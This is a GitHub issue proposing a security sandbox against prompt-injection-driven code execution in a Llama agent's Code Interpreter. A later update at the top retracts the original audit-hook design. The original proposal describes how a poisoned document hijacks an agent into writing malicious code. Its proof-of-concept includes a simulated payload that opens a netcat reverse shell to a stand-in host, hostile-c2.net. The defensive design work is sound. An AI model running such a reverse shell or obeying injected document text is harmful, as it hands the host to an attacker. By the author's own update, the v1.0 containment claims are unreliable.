Skip to content
This repository was archived by the owner on Apr 28, 2026. It is now read-only.
This repository was archived by the owner on Apr 28, 2026. It is now read-only.

[Architecture Proposal] Preventing RCE in Code Interpreter Tools via PEP 578 OS-Boundary Intercepts #223

@kwdoug63

Description

@kwdoug63

Update (2026-04-20): Architecture superseded — see v1.1

The PEP 578 audit-hook design described below was the v1.0 architecture and has been superseded.
External review (#223) demonstrated that sys.addaudithook does not cross the subprocess boundary — the hook fires only in the current interpreter, so a child process spawned via subprocess.run executes outside the hook's visibility. The accompanying string-signature denylist was also unsound against renamed binaries, absolute paths, and encoded payloads.

VAREK v1.1 (shipped 2026-04-20) moves enforcement off the interpreter hook and into the kernel:

  • seccomp-bpf` filter loaded under PR_SET_NO_NEW_PRIVS so it is inherited across every fork/clone and cannot be dropped
  • cgroups v2 for memory / cpu / pids / wall-clock bounds
  • user / mount / network / IPC / PID namespaces
    execve denied by default in the sandbox, which makes the binary allowlist trivially enforceable at the parent
  • PEP 578 hook retained as telemetry only; it no longer carries enforcement weight
  • Fail-closed when the backend is unavailable on the host

An integration with this project should wrap the v1.1 kernel-level sandbox (sandbox.SeccompBpfBackend via varek_warden.execute_untrusted), not the v1.0 audit hook. The two-line enforce_strict_mode() example in the original description arms telemetry only in v1.1 and does not by itself provide containment.

Relevant links:

  • v1.1 write-up: VAREK_v1.1_SECURITY_UPDATE.md
  • Threat model: docs/security/threat-model.md
  • Regression test (the original PoC, now codified): tests/security/test_issue_223_regression.py

The original v1.0 description is preserved below for historical context. If Prefect maintainers remain interested in a SecureTask / VarekGuardrail integration, I will rewrite the proposal against the v1.1 architecture.


The feature, motivation and pitch

Context: As developers build local assistants using the Llama Agentic System, the native Code Interpreter tool introduces a critical execution boundary vulnerability: Indirect Prompt Injection leading to Agentic Remote Code Execution (RCE).

If a Llama 3 agent is tasked with summarizing an untrusted external document (e.g., a poisoned PDF or scraped webpage) that contains an embedded adversarial string, the agent can suffer a cognitive bypass. The hijacked agent will then autonomously write a malicious Python script (such as establishing a reverse shell) and pass it directly to the Code Interpreter for execution on the host machine.

Probabilistic prompt filters and system prompts frequently fail to contain execution once the LLM's context window is sufficiently polluted by the poisoned document.

The Proposed Architecture: Sober Agentic Infrastructure (VAREK)
To create a deterministic security boundary for the Llama Stack, I have developed an architecture that utilizes CPython PEP 578 Audit Hooks to sit beneath the LLM and the Code Interpreter execution layers.

Rather than trying to parse the LLM's output for malicious intent, this intercept monitors the underlying OS-level system calls spawned by the Code Interpreter. If a hijacked tool attempts an unauthorized OS-level override, the kernel-level hook snaps the execution thread in microseconds—terminating the process deterministically before the underlying operating system receives the instruction.

Proof of Concept: Code Interpreter Kinetic Intercept
I have decoupled the intercept logic into a zero-dependency, pure Python module (varek_warden.py) for frictionless evaluation by Meta's agentic engineers.

The implementation below demonstrates the architecture physically terminating a hijacked Llama Agent process after it attempts to execute a malicious reverse shell via the Code Interpreter:

import subprocess
import varek_warden

# Arms the PEP 578 OS-Boundary Intercept for the Llama Agentic System
varek_warden.enforce_strict_mode()

def simulate_llama_code_interpreter(generated_code):
    # The hijacked Llama agent attempts to run the adversarial code block 
    # via the local IPython/Subprocess runtime tool.
    
    # VAREK KINETIC STRIKE: Intercepts the underlying thread at the OS boundary.
    try:
        subprocess.run(["python", "-c", generated_code], shell=False, check=True)
    except Exception as e:
        print(f"\n[VAREK KINETIC INTERCEPT] Code Interpreter Breach Prevented: {e}")
        print("[*] Host machine integrity maintained.\n")

if __name__ == "__main__":
    # Simulated Malicious Output from a hijacked Llama 3 Agent 
    hijacked_llama_output = "import os\nos.system('nc -e /bin/bash hostile-c2.net 4444')"
    simulate_llama_code_interpreter(hijacked_llama_output)

Repository & Full Implementation:
👉 17-meta-llama-agent-intercept.py

I submit this zero-dependency runtime architecture for review by the Meta engineers building and securing the Llama Agentic System toolchain.

Alternatives

No response

Additional context

No response

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions